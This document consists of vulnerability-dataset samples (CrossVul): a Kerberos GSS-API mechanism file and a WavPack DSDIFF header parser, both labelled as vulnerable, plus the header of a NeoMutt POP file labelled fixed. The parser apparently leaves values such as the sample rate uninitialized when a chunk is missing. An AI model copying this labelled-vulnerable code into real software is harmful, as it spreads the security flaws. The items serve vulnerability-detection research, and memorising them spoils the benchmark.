{GSS_KRB5_FREE_LUCID_SEC_CONTEXT_OID_LENGTH, GSS_KRB5_FREE_LUCID_SEC_CONTEXT_OID},
gss_krb5int_free_lucid_sec_context
},
#ifndef _WIN32
{
{GSS_KRB5_USE_KDC_CONTEXT_OID_LENGTH, GSS_KRB5_USE_KDC_CONTEXT_OID},
krb5int_gss_use_kdc_context
},
#endif
};
static OM_uint32 KRB5_CALLCONV
krb5_gssspi_mech_invoke (OM_uint32 *minor_status,
const gss_OID desired_mech,
const gss_OID desired_object,
gss_buffer_t value)
{
size_t i;
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (desired_mech == GSS_C_NO_OID)
return GSS_S_BAD_MECH;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
for (i = 0; i < sizeof(krb5_gssspi_mech_invoke_ops)/
sizeof(krb5_gssspi_mech_invoke_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gssspi_mech_invoke_ops[i].oid)) {
return (*krb5_gssspi_mech_invoke_ops[i].func)(minor_status,
desired_mech,
desired_object,
value);
}
}
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
#define GS2_KRB5_SASL_NAME "GS2-KRB5"
#define GS2_KRB5_SASL_NAME_LEN (sizeof(GS2_KRB5_SASL_NAME) - 1)
#define GS2_IAKERB_SASL_NAME "GS2-IAKERB"
#define GS2_IAKERB_SASL_NAME_LEN (sizeof(GS2_IAKERB_SASL_NAME) - 1)
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_mech_for_saslname(OM_uint32 *minor_status,
const gss_buffer_t sasl_mech_name,
gss_OID *mech_type)
{
*minor_status = 0;
if (sasl_mech_name->length == GS2_KRB5_SASL_NAME_LEN &&
memcmp(sasl_mech_name->value,
GS2_KRB5_SASL_NAME, GS2_KRB5_SASL_NAME_LEN) == 0) {
if (mech_type != NULL)
*mech_type = (gss_OID)gss_mech_krb5;
return GSS_S_COMPLETE;
} else if (sasl_mech_name->length == GS2_IAKERB_SASL_NAME_LEN &&
memcmp(sasl_mech_name->value,
GS2_IAKERB_SASL_NAME, GS2_IAKERB_SASL_NAME_LEN) == 0) {
if (mech_type != NULL)
*mech_type = (gss_OID)gss_mech_iakerb;
return GSS_S_COMPLETE;
}
return GSS_S_BAD_MECH;
}
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_saslname_for_mech(OM_uint32 *minor_status,
const gss_OID desired_mech,
gss_buffer_t sasl_mech_name,
gss_buffer_t mech_name,
gss_buffer_t mech_description)
{
if (g_OID_equal(desired_mech, gss_mech_iakerb)) {
if (!g_make_string_buffer(GS2_IAKERB_SASL_NAME, sasl_mech_name) ||
!g_make_string_buffer("iakerb", mech_name) ||
!g_make_string_buffer("Initial and Pass Through Authentication "
"Kerberos Mechanism (IAKERB)",
mech_description))
goto fail;
} else {
if (!g_make_string_buffer(GS2_KRB5_SASL_NAME, sasl_mech_name) ||
!g_make_string_buffer("krb5", mech_name) ||
!g_make_string_buffer("Kerberos 5 GSS-API Mechanism",
mech_description))
goto fail;
}
*minor_status = 0;
return GSS_S_COMPLETE;
fail:
*minor_status = ENOMEM;
return GSS_S_FAILURE;
}
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_attrs_for_mech(OM_uint32 *minor_status,
gss_const_OID mech,
gss_OID_set *mech_attrs,
gss_OID_set *known_mech_attrs)
{
OM_uint32 major, tmpMinor;
if (mech_attrs == NULL) {
*minor_status = 0;
return GSS_S_COMPLETE;
}
major = gss_create_empty_oid_set(minor_status, mech_attrs);
if (GSS_ERROR(major))
goto cleanup;
#define MA_SUPPORTED(ma) do { \
major = gss_add_oid_set_member(minor_status, (gss_OID)ma, \
mech_attrs); \
if (GSS_ERROR(major)) \
goto cleanup; \
} while (0)
MA_SUPPORTED(GSS_C_MA_MECH_CONCRETE);
MA_SUPPORTED(GSS_C_MA_ITOK_FRAMED);
MA_SUPPORTED(GSS_C_MA_AUTH_INIT);
MA_SUPPORTED(GSS_C_MA_AUTH_TARG);
MA_SUPPORTED(GSS_C_MA_DELEG_CRED);
MA_SUPPORTED(GSS_C_MA_INTEG_PROT);
MA_SUPPORTED(GSS_C_MA_CONF_PROT);
MA_SUPPORTED(GSS_C_MA_MIC);
MA_SUPPORTED(GSS_C_MA_WRAP);
MA_SUPPORTED(GSS_C_MA_PROT_READY);
MA_SUPPORTED(GSS_C_MA_REPLAY_DET);
MA_SUPPORTED(GSS_C_MA_OOS_DET);
MA_SUPPORTED(GSS_C_MA_CBINDINGS);
MA_SUPPORTED(GSS_C_MA_CTX_TRANS);
if (g_OID_equal(mech, gss_mech_iakerb)) {
MA_SUPPORTED(GSS_C_MA_AUTH_INIT_INIT);
MA_SUPPORTED(GSS_C_MA_NOT_DFLT_MECH);
} else if (!g_OID_equal(mech, gss_mech_krb5)) {
MA_SUPPORTED(GSS_C_MA_DEPRECATED);
}
cleanup:
if (GSS_ERROR(major))
gss_release_oid_set(&tmpMinor, mech_attrs);
return major;
}
static OM_uint32 KRB5_CALLCONV
krb5_gss_localname(OM_uint32 *minor,
const gss_name_t pname,
const gss_const_OID mech_type,
gss_buffer_t localname)
{
krb5_context context;
krb5_error_code code;
krb5_gss_name_t kname;
char lname[BUFSIZ];
code = krb5_gss_init_context(&context);
if (code != 0) {
*minor = code;
return GSS_S_FAILURE;
}
kname = (krb5_gss_name_t)pname;
code = krb5_aname_to_localname(context, kname->princ,
sizeof(lname), lname);
if (code != 0) {
*minor = KRB5_NO_LOCALNAME;
krb5_free_context(context);
return GSS_S_FAILURE;
}
krb5_free_context(context);
localname->value = gssalloc_strdup(lname);
localname->length = strlen(lname);
return (code == 0) ? GSS_S_COMPLETE : GSS_S_FAILURE;
}
static OM_uint32 KRB5_CALLCONV
krb5_gss_authorize_localname(OM_uint32 *minor,
const gss_name_t pname,
gss_const_buffer_t local_user,
gss_const_OID name_type)
{
krb5_context context;
krb5_error_code code;
krb5_gss_name_t kname;
char *user;
int user_ok;
if (name_type != GSS_C_NO_OID &&
!g_OID_equal(name_type, GSS_C_NT_USER_NAME)) {
return GSS_S_BAD_NAMETYPE;
}
kname = (krb5_gss_name_t)pname;
code = krb5_gss_init_context(&context);
if (code != 0) {
*minor = code;
return GSS_S_FAILURE;
}
user = k5memdup0(local_user->value, local_user->length, &code);
if (user == NULL) {
*minor = code;
krb5_free_context(context);
return GSS_S_FAILURE;
}
user_ok = krb5_kuserok(context, kname->princ, user);
free(user);
krb5_free_context(context);
*minor = 0;
return user_ok ? GSS_S_COMPLETE : GSS_S_UNAUTHORIZED;
}
static struct gss_config krb5_mechanism = {
{ GSS_MECH_KRB5_OID_LENGTH, GSS_MECH_KRB5_OID },
NULL,
krb5_gss_acquire_cred,
krb5_gss_release_cred,
krb5_gss_init_sec_context,
#ifdef LEAN_CLIENT
NULL,
#else
krb5_gss_accept_sec_context,
#endif
krb5_gss_process_context_token,
krb5_gss_delete_sec_context,
krb5_gss_context_time,
krb5_gss_get_mic,
krb5_gss_verify_mic,
#if defined(IOV_SHIM_EXERCISE_WRAP) || defined(IOV_SHIM_EXERCISE)
NULL,
#else
krb5_gss_wrap,
#endif
#if defined(IOV_SHIM_EXERCISE_UNWRAP) || defined(IOV_SHIM_EXERCISE)
NULL,
#else
krb5_gss_unwrap,
#endif
krb5_gss_display_status,
krb5_gss_indicate_mechs,
krb5_gss_compare_name,
krb5_gss_display_name,
krb5_gss_import_name,
krb5_gss_release_name,
krb5_gss_inquire_cred,
NULL, /* add_cred */
#ifdef LEAN_CLIENT
NULL,
NULL,
#else
krb5_gss_export_sec_context,
krb5_gss_import_sec_context,
#endif
krb5_gss_inquire_cred_by_mech,
krb5_gss_inquire_names_for_mech,
krb5_gss_inquire_context,
krb5_gss_internal_release_oid,
krb5_gss_wrap_size_limit,
krb5_gss_localname,
krb5_gss_authorize_localname,
krb5_gss_export_name,
krb5_gss_duplicate_name,
krb5_gss_store_cred,
krb5_gss_inquire_sec_context_by_oid,
krb5_gss_inquire_cred_by_oid,
krb5_gss_set_sec_context_option,
krb5_gssspi_set_cred_option,
krb5_gssspi_mech_invoke,
NULL, /* wrap_aead */
NULL, /* unwrap_aead */
krb5_gss_wrap_iov,
krb5_gss_unwrap_iov,
krb5_gss_wrap_iov_length,
NULL, /* complete_auth_token */
krb5_gss_acquire_cred_impersonate_name,
NULL, /* krb5_gss_add_cred_impersonate_name */
NULL, /* display_name_ext */
krb5_gss_inquire_name,
krb5_gss_get_name_attribute,
krb5_gss_set_name_attribute,
krb5_gss_delete_name_attribute,
krb5_gss_export_name_composite,
krb5_gss_map_name_to_any,
krb5_gss_release_any_name_mapping,
krb5_gss_pseudo_random,
NULL, /* set_neg_mechs */
krb5_gss_inquire_saslname_for_mech,
krb5_gss_inquire_mech_for_saslname,
krb5_gss_inquire_attrs_for_mech,
krb5_gss_acquire_cred_from,
krb5_gss_store_cred_into,
krb5_gss_acquire_cred_with_password,
krb5_gss_export_cred,
krb5_gss_import_cred,
NULL, /* import_sec_context_by_mech */
NULL, /* import_name_by_mech */
NULL, /* import_cred_by_mech */
krb5_gss_get_mic_iov,
krb5_gss_verify_mic_iov,
krb5_gss_get_mic_iov_length,
};
#ifdef _GSS_STATIC_LINK
#include "mglueP.h"
static int gss_iakerbmechglue_init(void)
{
struct gss_mech_config mech_iakerb;
struct gss_config iakerb_mechanism = krb5_mechanism;
/* IAKERB mechanism mirrors krb5, but with different context SPIs */
iakerb_mechanism.gss_accept_sec_context = iakerb_gss_accept_sec_context;
iakerb_mechanism.gss_init_sec_context = iakerb_gss_init_sec_context;
iakerb_mechanism.gss_delete_sec_context = iakerb_gss_delete_sec_context;
iakerb_mechanism.gss_acquire_cred = iakerb_gss_acquire_cred;
iakerb_mechanism.gssspi_acquire_cred_with_password
= iakerb_gss_acquire_cred_with_password;
memset(&mech_iakerb, 0, sizeof(mech_iakerb));
mech_iakerb.mech = &iakerb_mechanism;
mech_iakerb.mechNameStr = "iakerb";
mech_iakerb.mech_type = (gss_OID)gss_mech_iakerb;
gssint_register_mechinfo(&mech_iakerb);
return 0;
}
static int gss_krb5mechglue_init(void)
{
struct gss_mech_config mech_krb5;
memset(&mech_krb5, 0, sizeof(mech_krb5));
mech_krb5.mech = &krb5_mechanism;
mech_krb5.mechNameStr = "kerberos_v5";
mech_krb5.mech_type = (gss_OID)gss_mech_krb5;
gssint_register_mechinfo(&mech_krb5);
mech_krb5.mechNameStr = "kerberos_v5_old";
mech_krb5.mech_type = (gss_OID)gss_mech_krb5_old;
gssint_register_mechinfo(&mech_krb5);
mech_krb5.mechNameStr = "mskrb";
mech_krb5.mech_type = (gss_OID)gss_mech_krb5_wrong;
gssint_register_mechinfo(&mech_krb5);
return 0;
}
#else
MAKE_INIT_FUNCTION(gss_krb5int_lib_init);
MAKE_FINI_FUNCTION(gss_krb5int_lib_fini);
gss_mechanism KRB5_CALLCONV
gss_mech_initialize(void)
{
return &krb5_mechanism;
}
#endif /* _GSS_STATIC_LINK */
int gss_krb5int_lib_init(void)
{
int err;
#ifdef SHOW_INITFINI_FUNCS
printf("gss_krb5int_lib_init\n");
#endif
add_error_table(&et_k5g_error_table);
#ifndef LEAN_CLIENT
err = k5_mutex_finish_init(&gssint_krb5_keytab_lock);
if (err)
return err;
#endif /* LEAN_CLIENT */
err = k5_key_register(K5_KEY_GSS_KRB5_SET_CCACHE_OLD_NAME, free);
if (err)
return err;
err = k5_key_register(K5_KEY_GSS_KRB5_CCACHE_NAME, free);
if (err)
return err;
err = k5_key_register(K5_KEY_GSS_KRB5_ERROR_MESSAGE,
krb5_gss_delete_error_info);
if (err)
return err;
#ifndef _WIN32
err = k5_mutex_finish_init(&kg_kdc_flag_mutex);
if (err)
return err;
err = k5_mutex_finish_init(&kg_vdb.mutex);
if (err)
return err;
#endif
#ifdef _GSS_STATIC_LINK
err = gss_krb5mechglue_init();
if (err)
return err;
err = gss_iakerbmechglue_init();
if (err)
return err;
#endif
return 0;
}
void gss_krb5int_lib_fini(void)
{
#ifndef _GSS_STATIC_LINK
if (!INITIALIZER_RAN(gss_krb5int_lib_init) || PROGRAM_EXITING()) {
# ifdef SHOW_INITFINI_FUNCS
printf("gss_krb5int_lib_fini: skipping\n");
# endif
return;
}
#endif
#ifdef SHOW_INITFINI_FUNCS
printf("gss_krb5int_lib_fini\n");
#endif
remove_error_table(&et_k5g_error_table);
k5_key_delete(K5_KEY_GSS_KRB5_SET_CCACHE_OLD_NAME);
k5_key_delete(K5_KEY_GSS_KRB5_CCACHE_NAME);
k5_key_delete(K5_KEY_GSS_KRB5_ERROR_MESSAGE);
k5_mutex_destroy(&kg_vdb.mutex);
#ifndef _WIN32
k5_mutex_destroy(&kg_kdc_flag_mutex);
#endif
#ifndef LEAN_CLIENT
k5_mutex_destroy(&gssint_krb5_keytab_lock);
#endif /* LEAN_CLIENT */
}
#ifdef _GSS_STATIC_LINK
extern OM_uint32 gssint_lib_init(void);
#endif
OM_uint32 gss_krb5int_initialize_library (void)
{
#ifdef _GSS_STATIC_LINK
return gssint_mechglue_initialize_library();
#else
return CALL_INIT_FUNCTION(gss_krb5int_lib_init);
#endif
}
| ./CrossVul/dataset_final_sorted/CWE-18/c/bad_1535_1 |
crossvul-cpp_data_bad_824_0 | ////////////////////////////////////////////////////////////////////////////
// **** WAVPACK **** //
// Hybrid Lossless Wavefile Compressor //
// Copyright (c) 1998 - 2019 David Bryant. //
// All Rights Reserved. //
// Distributed under the BSD Software License (see license.txt) //
////////////////////////////////////////////////////////////////////////////
// dsdiff.c
// This module is a helper to the WavPack command-line programs to support DFF files.
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <math.h>
#include <stdio.h>
#include <ctype.h>
#include "wavpack.h"
#include "utils.h"
#include "md5.h"
#ifdef _WIN32
#define strdup(x) _strdup(x)
#endif
#define WAVPACK_NO_ERROR 0
#define WAVPACK_SOFT_ERROR 1
#define WAVPACK_HARD_ERROR 2
extern int debug_logging_mode;
#pragma pack(push,2)
typedef struct {
char ckID [4];
int64_t ckDataSize;
} DFFChunkHeader;
typedef struct {
char ckID [4];
int64_t ckDataSize;
char formType [4];
} DFFFileHeader;
typedef struct {
char ckID [4];
int64_t ckDataSize;
uint32_t version;
} DFFVersionChunk;
typedef struct {
char ckID [4];
int64_t ckDataSize;
uint32_t sampleRate;
} DFFSampleRateChunk;
typedef struct {
char ckID [4];
int64_t ckDataSize;
uint16_t numChannels;
} DFFChannelsHeader;
typedef struct {
char ckID [4];
int64_t ckDataSize;
char compressionType [4];
} DFFCompressionHeader;
#pragma pack(pop)
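// Byte-order descriptors handed to WavpackBigEndianToNative() and
// WavpackNativeToBigEndian(); roughly, a digit skips that many bytes unchanged
// (the 4-character ID fields) while 'D', 'L' and 'S' byte-swap 64-, 32- and
// 16-bit fields respectively.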
#define DFFChunkHeaderFormat "4D"
#define DFFFileHeaderFormat "4D4"
#define DFFVersionChunkFormat "4DL"
#define DFFSampleRateChunkFormat "4DL"
#define DFFChannelsHeaderFormat "4DS"
#define DFFCompressionHeaderFormat "4D4"
int ParseDsdiffHeaderConfig (FILE *infile, char *infilename, char *fourcc, WavpackContext *wpc, WavpackConfig *config)
{
int64_t infilesize, total_samples;
DFFFileHeader dff_file_header;
DFFChunkHeader dff_chunk_header;
uint32_t bcount;
infilesize = DoGetFileSize (infile);
memcpy (&dff_file_header, fourcc, 4);
if ((!DoReadFile (infile, ((char *) &dff_file_header) + 4, sizeof (DFFFileHeader) - 4, &bcount) ||
bcount != sizeof (DFFFileHeader) - 4) || strncmp (dff_file_header.formType, "DSD ", 4)) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
else if (!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, &dff_file_header, sizeof (DFFFileHeader))) {
error_line ("%s", WavpackGetErrorMessage (wpc));
return WAVPACK_SOFT_ERROR;
}
#if 1 // this might be a little too picky...
WavpackBigEndianToNative (&dff_file_header, DFFFileHeaderFormat);
if (infilesize && !(config->qmode & QMODE_IGNORE_LENGTH) &&
dff_file_header.ckDataSize && dff_file_header.ckDataSize + 1 && dff_file_header.ckDataSize + 12 != infilesize) {
error_line ("%s is not a valid .DFF file (by total size)!", infilename);
return WAVPACK_SOFT_ERROR;
}
if (debug_logging_mode)
error_line ("file header indicated length = %lld", dff_file_header.ckDataSize);
#endif
// loop through all elements of the DSDIFF header
// (until the data chunk) and copy them to the output file
while (1) {
if (!DoReadFile (infile, &dff_chunk_header, sizeof (DFFChunkHeader), &bcount) ||
bcount != sizeof (DFFChunkHeader)) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
else if (!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, &dff_chunk_header, sizeof (DFFChunkHeader))) {
error_line ("%s", WavpackGetErrorMessage (wpc));
return WAVPACK_SOFT_ERROR;
}
WavpackBigEndianToNative (&dff_chunk_header, DFFChunkHeaderFormat);
if (debug_logging_mode)
error_line ("chunk header indicated length = %lld", dff_chunk_header.ckDataSize);
if (!strncmp (dff_chunk_header.ckID, "FVER", 4)) {
uint32_t version;
if (dff_chunk_header.ckDataSize != sizeof (version) ||
!DoReadFile (infile, &version, sizeof (version), &bcount) ||
bcount != sizeof (version)) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
else if (!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, &version, sizeof (version))) {
error_line ("%s", WavpackGetErrorMessage (wpc));
return WAVPACK_SOFT_ERROR;
}
WavpackBigEndianToNative (&version, "L");
if (debug_logging_mode)
error_line ("dsdiff file version = 0x%08x", version);
}
else if (!strncmp (dff_chunk_header.ckID, "PROP", 4)) {
char *prop_chunk;
if (dff_chunk_header.ckDataSize < 4 || dff_chunk_header.ckDataSize > 1024) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
if (debug_logging_mode)
error_line ("got PROP chunk of %d bytes total", (int) dff_chunk_header.ckDataSize);
prop_chunk = malloc ((size_t) dff_chunk_header.ckDataSize);
if (!DoReadFile (infile, prop_chunk, (uint32_t) dff_chunk_header.ckDataSize, &bcount) ||
bcount != dff_chunk_header.ckDataSize) {
error_line ("%s is not a valid .DFF file!", infilename);
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
else if (!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, prop_chunk, (uint32_t) dff_chunk_header.ckDataSize)) {
error_line ("%s", WavpackGetErrorMessage (wpc));
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
if (!strncmp (prop_chunk, "SND ", 4)) {
char *cptr = prop_chunk + 4, *eptr = prop_chunk + dff_chunk_header.ckDataSize;
uint16_t numChannels = 0, chansSpecified, chanMask = 0;
uint32_t sampleRate;
while (eptr - cptr >= sizeof (dff_chunk_header)) {
memcpy (&dff_chunk_header, cptr, sizeof (dff_chunk_header));
cptr += sizeof (dff_chunk_header);
WavpackBigEndianToNative (&dff_chunk_header, DFFChunkHeaderFormat);
if (dff_chunk_header.ckDataSize > 0 && dff_chunk_header.ckDataSize <= eptr - cptr) {
if (!strncmp (dff_chunk_header.ckID, "FS ", 4) && dff_chunk_header.ckDataSize == 4) {
memcpy (&sampleRate, cptr, sizeof (sampleRate));
WavpackBigEndianToNative (&sampleRate, "L");
cptr += dff_chunk_header.ckDataSize;
if (debug_logging_mode)
error_line ("got sample rate of %u Hz", sampleRate);
}
else if (!strncmp (dff_chunk_header.ckID, "CHNL", 4) && dff_chunk_header.ckDataSize >= 2) {
memcpy (&numChannels, cptr, sizeof (numChannels));
WavpackBigEndianToNative (&numChannels, "S");
cptr += sizeof (numChannels);
chansSpecified = (int)(dff_chunk_header.ckDataSize - sizeof (numChannels)) / 4;
if (numChannels < chansSpecified || numChannels < 1 || numChannels > 256) {
error_line ("%s is not a valid .DFF file!", infilename);
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
while (chansSpecified--) {
if (!strncmp (cptr, "SLFT", 4) || !strncmp (cptr, "MLFT", 4))
chanMask |= 0x1;
else if (!strncmp (cptr, "SRGT", 4) || !strncmp (cptr, "MRGT", 4))
chanMask |= 0x2;
else if (!strncmp (cptr, "LS ", 4))
chanMask |= 0x10;
else if (!strncmp (cptr, "RS ", 4))
chanMask |= 0x20;
else if (!strncmp (cptr, "C ", 4))
chanMask |= 0x4;
else if (!strncmp (cptr, "LFE ", 4))
chanMask |= 0x8;
else
if (debug_logging_mode)
error_line ("undefined channel ID %c%c%c%c", cptr [0], cptr [1], cptr [2], cptr [3]);
cptr += 4;
}
if (debug_logging_mode)
error_line ("%d channels, mask = 0x%08x", numChannels, chanMask);
}
else if (!strncmp (dff_chunk_header.ckID, "CMPR", 4) && dff_chunk_header.ckDataSize >= 4) {
if (strncmp (cptr, "DSD ", 4)) {
error_line ("DSDIFF files must be uncompressed, not \"%c%c%c%c\"!",
cptr [0], cptr [1], cptr [2], cptr [3]);
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
cptr += dff_chunk_header.ckDataSize;
}
else {
if (debug_logging_mode)
error_line ("got PROP/SND chunk type \"%c%c%c%c\" of %d bytes", dff_chunk_header.ckID [0],
dff_chunk_header.ckID [1], dff_chunk_header.ckID [2], dff_chunk_header.ckID [3], dff_chunk_header.ckDataSize);
cptr += dff_chunk_header.ckDataSize;
}
}
else {
error_line ("%s is not a valid .DFF file!", infilename);
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
}
if (chanMask && (config->channel_mask || (config->qmode & QMODE_CHANS_UNASSIGNED))) {
error_line ("this DSDIFF file already has channel order information!");
free (prop_chunk);
return WAVPACK_SOFT_ERROR;
}
else if (chanMask)
config->channel_mask = chanMask;
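// DSD audio is 1-bit and is handed to libwavpack packed eight samples per
// byte, so the configured rate is the DSD bit rate divided by 8 and each
// stored "sample" is one byte (MSB first, as flagged below).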
config->bits_per_sample = 8;
config->bytes_per_sample = 1;
config->num_channels = numChannels;
config->sample_rate = sampleRate / 8;
config->qmode |= QMODE_DSD_MSB_FIRST;
}
else if (debug_logging_mode)
error_line ("got unknown PROP chunk type \"%c%c%c%c\" of %d bytes",
prop_chunk [0], prop_chunk [1], prop_chunk [2], prop_chunk [3], dff_chunk_header.ckDataSize);
free (prop_chunk);
}
else if (!strncmp (dff_chunk_header.ckID, "DSD ", 4)) {
if (!config->num_channels) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
total_samples = dff_chunk_header.ckDataSize / config->num_channels;
break;
}
else { // just copy unknown chunks to output file
int bytes_to_copy = (int)(((dff_chunk_header.ckDataSize) + 1) & ~(int64_t)1);
char *buff;
if (bytes_to_copy < 0 || bytes_to_copy > 4194304) {
error_line ("%s is not a valid .DFF file!", infilename);
return WAVPACK_SOFT_ERROR;
}
buff = malloc (bytes_to_copy);
if (debug_logging_mode)
error_line ("extra unknown chunk \"%c%c%c%c\" of %d bytes",
dff_chunk_header.ckID [0], dff_chunk_header.ckID [1], dff_chunk_header.ckID [2],
dff_chunk_header.ckID [3], dff_chunk_header.ckDataSize);
if (!DoReadFile (infile, buff, bytes_to_copy, &bcount) ||
bcount != bytes_to_copy ||
(!(config->qmode & QMODE_NO_STORE_WRAPPER) &&
!WavpackAddWrapper (wpc, buff, bytes_to_copy))) {
error_line ("%s", WavpackGetErrorMessage (wpc));
free (buff);
return WAVPACK_SOFT_ERROR;
}
free (buff);
}
}
if (debug_logging_mode)
error_line ("setting configuration with %lld samples", total_samples);
if (!WavpackSetConfiguration64 (wpc, config, total_samples, NULL)) {
error_line ("%s: %s", infilename, WavpackGetErrorMessage (wpc));
return WAVPACK_SOFT_ERROR;
}
return WAVPACK_NO_ERROR;
}
int WriteDsdiffHeader (FILE *outfile, WavpackContext *wpc, int64_t total_samples, int qmode)
{
uint32_t chan_mask = WavpackGetChannelMask (wpc);
int num_channels = WavpackGetNumChannels (wpc);
DFFFileHeader file_header, prop_header;
DFFChunkHeader data_header;
DFFVersionChunk ver_chunk;
DFFSampleRateChunk fs_chunk;
DFFChannelsHeader chan_header;
DFFCompressionHeader cmpr_header;
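// The CMPR chunk stores its human-readable name as a counted (Pascal-style)
// string; the leading \016 is the length (14) of "not compressed".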
char *cmpr_name = "\016not compressed", *chan_ids;
int64_t file_size, prop_chunk_size, data_size;
int cmpr_name_size, chan_ids_size;
uint32_t bcount;
if (debug_logging_mode)
error_line ("WriteDsdiffHeader (), total samples = %lld, qmode = 0x%02x\n",
(long long) total_samples, qmode);
cmpr_name_size = (strlen (cmpr_name) + 1) & ~1;
chan_ids_size = num_channels * 4;
chan_ids = malloc (chan_ids_size);
if (chan_ids) {
uint32_t scan_mask = 0x1;
char *cptr = chan_ids;
int ci, uci = 0;
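// Walk the channel mask in its canonical bit order and emit the matching
// 4-character DSDIFF channel IDs; channels without a standard mapping get a
// generated "Cnnn" label instead.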
for (ci = 0; ci < num_channels; ++ci) {
while (scan_mask && !(scan_mask & chan_mask))
scan_mask <<= 1;
if (scan_mask & 0x1)
memcpy (cptr, num_channels <= 2 ? "SLFT" : "MLFT", 4);
else if (scan_mask & 0x2)
memcpy (cptr, num_channels <= 2 ? "SRGT" : "MRGT", 4);
else if (scan_mask & 0x4)
memcpy (cptr, "C ", 4);
else if (scan_mask & 0x8)
memcpy (cptr, "LFE ", 4);
else if (scan_mask & 0x10)
memcpy (cptr, "LS ", 4);
else if (scan_mask & 0x20)
memcpy (cptr, "RS ", 4);
else {
cptr [0] = 'C';
cptr [1] = (uci / 100) + '0';
cptr [2] = ((uci % 100) / 10) + '0';
cptr [3] = (uci % 10) + '0';
uci++;
}
scan_mask <<= 1;
cptr += 4;
}
}
else {
error_line ("can't allocate memory!");
return FALSE;
}
data_size = total_samples * num_channels;
prop_chunk_size = sizeof (prop_header) + sizeof (fs_chunk) + sizeof (chan_header) + chan_ids_size + sizeof (cmpr_header) + cmpr_name_size;
file_size = sizeof (file_header) + sizeof (ver_chunk) + prop_chunk_size + sizeof (data_header) + ((data_size + 1) & ~(int64_t)1);
memcpy (file_header.ckID, "FRM8", 4);
file_header.ckDataSize = file_size - 12;
memcpy (file_header.formType, "DSD ", 4);
memcpy (prop_header.ckID, "PROP", 4);
prop_header.ckDataSize = prop_chunk_size - 12;
memcpy (prop_header.formType, "SND ", 4);
memcpy (ver_chunk.ckID, "FVER", 4);
ver_chunk.ckDataSize = sizeof (ver_chunk) - 12;
ver_chunk.version = 0x01050000;
memcpy (fs_chunk.ckID, "FS ", 4);
fs_chunk.ckDataSize = sizeof (fs_chunk) - 12;
fs_chunk.sampleRate = WavpackGetSampleRate (wpc) * 8;
memcpy (chan_header.ckID, "CHNL", 4);
chan_header.ckDataSize = sizeof (chan_header) + chan_ids_size - 12;
chan_header.numChannels = num_channels;
memcpy (cmpr_header.ckID, "CMPR", 4);
cmpr_header.ckDataSize = sizeof (cmpr_header) + cmpr_name_size - 12;
memcpy (cmpr_header.compressionType, "DSD ", 4);
memcpy (data_header.ckID, "DSD ", 4);
data_header.ckDataSize = data_size;
WavpackNativeToBigEndian (&file_header, DFFFileHeaderFormat);
WavpackNativeToBigEndian (&ver_chunk, DFFVersionChunkFormat);
WavpackNativeToBigEndian (&prop_header, DFFFileHeaderFormat);
WavpackNativeToBigEndian (&fs_chunk, DFFSampleRateChunkFormat);
WavpackNativeToBigEndian (&chan_header, DFFChannelsHeaderFormat);
WavpackNativeToBigEndian (&cmpr_header, DFFCompressionHeaderFormat);
WavpackNativeToBigEndian (&data_header, DFFChunkHeaderFormat);
if (!DoWriteFile (outfile, &file_header, sizeof (file_header), &bcount) || bcount != sizeof (file_header) ||
!DoWriteFile (outfile, &ver_chunk, sizeof (ver_chunk), &bcount) || bcount != sizeof (ver_chunk) ||
!DoWriteFile (outfile, &prop_header, sizeof (prop_header), &bcount) || bcount != sizeof (prop_header) ||
!DoWriteFile (outfile, &fs_chunk, sizeof (fs_chunk), &bcount) || bcount != sizeof (fs_chunk) ||
!DoWriteFile (outfile, &chan_header, sizeof (chan_header), &bcount) || bcount != sizeof (chan_header) ||
!DoWriteFile (outfile, chan_ids, chan_ids_size, &bcount) || bcount != chan_ids_size ||
!DoWriteFile (outfile, &cmpr_header, sizeof (cmpr_header), &bcount) || bcount != sizeof (cmpr_header) ||
!DoWriteFile (outfile, cmpr_name, cmpr_name_size, &bcount) || bcount != cmpr_name_size ||
!DoWriteFile (outfile, &data_header, sizeof (data_header), &bcount) || bcount != sizeof (data_header)) {
error_line ("can't write .DFF data, disk probably full!");
free (chan_ids);
return FALSE;
}
free (chan_ids);
return TRUE;
}
| ./CrossVul/dataset_final_sorted/CWE-824/c/bad_824_0 |
crossvul-cpp_data_good_250_0 | /**
* @file
* POP network mailbox
*
* @authors
* Copyright (C) 2000-2002 Vsevolod Volkov <vvv@mutt.org.ua>
* Copyright (C) 2006-2007,2009 Rocco Rutte <pdmef@gmx.net>
*
* @copyright
* This program is free software: you can redistribute it and/or modify it under
* the terms of the GNU General Public License as published by the Free Software
* Foundation, either version 2 of the License, or (at your option) any later
* version.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
* FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
* details.
*
* You should have received a copy of the GNU General Public License along with
* this program. If not, see <http://www.gnu.org/licenses/>.
*/
/**
* @page pop POP network mailbox
*
* POP network mailbox
*/
#include "config.h"
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
